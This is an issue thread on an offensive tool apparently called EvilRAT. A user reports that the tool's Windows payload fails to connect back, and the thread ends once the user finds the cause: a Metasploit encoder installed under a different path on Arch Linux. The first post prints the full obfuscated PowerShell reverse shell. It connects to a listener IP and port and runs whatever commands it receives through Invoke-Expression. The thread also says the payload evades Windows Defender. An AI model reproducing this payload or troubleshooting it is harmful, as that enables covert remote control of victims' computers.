### ISSUE TITLE
Payload not executing

### ISSUE THREAD

**Issue by se7enge** [pr0xy-8L4d3/EvilRAT#5]
Running in a test environment, on a Windows 10 (19044) virtual machine, the payload does indeed evade detection as intended. However, I cannot seem to get the payload to execute properly and connect back to the listener. Maybe I am missing something very obvious, and if that is the case then I apologise.

Running `powershell -ExecutionPolicy Bypass Start-Process 'payload.bat'` appears to run the payload but no connection is made back to the listener. Executing directly from cmd with `.\payload.bat` returns the following error however:
 ```
'$hmGuXO' is not recognized as an internal or external command,
operable program or batch file.
```

The content of the payload, as generated via `EvilRAT.sh`, is as follows:

```
$hmGuXO='192.168.1.101';$jXFgb='4442';$OeGmpK=New-Object System.Net.Sockets.TCPClient($hmGuXO,$jXFgb);$VXMOY=$OeGmpK.GetStream();[byte[]]$uRhWU=0..65535|%{0};$nxFUFH=([text.encoding]::ASCII).GetBytes('PS '+(Get-Location).Path+'> ');$VXMOY.Write($nxFUFH,0,$nxFUFH.Length);while(($riojM=$VXMOY.Read($uRhWU,0,$uRhWU.Length)) -ne 0){$SaY=([text.encoding]::ASCII).GetString($uRhWU,0,$riojM);try{$nuuojT=(Invoke-Expression -c $SaY 2>&1|Out-String)}catch{Write-Warning 'Something went wrong with execution of command on the target.';Write-Error $_;};$hmGuXO0=$nuuojT+'PS '+(Get-Location).Path+'> ';$hmGuXO1=($hmGuXO2[0]|Out-String);$hmGuXO2.clear();$hmGuXO0=$hmGuXO0+$hmGuXO1;$nxFUFH=([text.encoding]::ASCII).GetBytes($hmGuXO0);$VXMOY.Write($nxFUFH,0,$nxFUFH.Length);$VXMOY.Flush();};$OeGmpK.Close();if($hmGuXO3){$hmGuXO3.Stop();};
```

And I have the listener automatically set through the `evilrat.rc` settings so the LHOST/LPORT are definitely correctly corresponding to the payload.

The system from which I generated the payload is Arch Linux (x86_64) kernel version 6.3.6-arch1-1 if that makes any difference.

Any help/advice much appreciated.

**Comment by pr0xy-8L4d3** [comment]
Hi. I tried it now on windows 10 (19045) and works fine, as it should. Are you sure that windows machine is in same subnet as your linux machine? can you ping it?

**Comment by se7enge** [comment]
It's on a NAT network so it's not on the same subnet but I can ping my host no problem and get a reverse shell or meterpreter session back to it if I disable defender and go about the usual well known methods. For example, using powershell on remote host with a netcat listener on local host, as well as various metasploit payloads, all of which are working just fine.

**Comment by pr0xy-8L4d3** [comment]
Really have no clue what could be a problem. As I said, I tried it yesterday and it works. Windows is up to date and I am using parrot OS. Maybe you should try on fresh windows installation.

**Comment by se7enge** [comment]
I've just tried on a fresh installation of Windows (inside VirtualBox) and the result is the same unfortunately. I'm going to try and generate a new payload from inside Kali Linux as opposed to Arch and see if that makes a difference, not sure why it would though.

**Comment by se7enge** [comment]
Okay I've figured it out. It wasn't working because, in Arch Linux, the metasploit encoders are installed in `/opt/metasploit/modules/encoders/` and the install.sh is expecting the path `/usr/share/metasploit-framework/modules/encoders/` to copy `psbase.rb` to. So I had manually placed `psbase.rb` in `/opt/metasploit/modules/encoders/ruby/` (since the module is ruby).

However, after moving `psbase.rb` up a directory and making a new payload it is working as expected. So the issue was just as discrepancy between the Debian and Arch Linux default installation paths for metasploit.
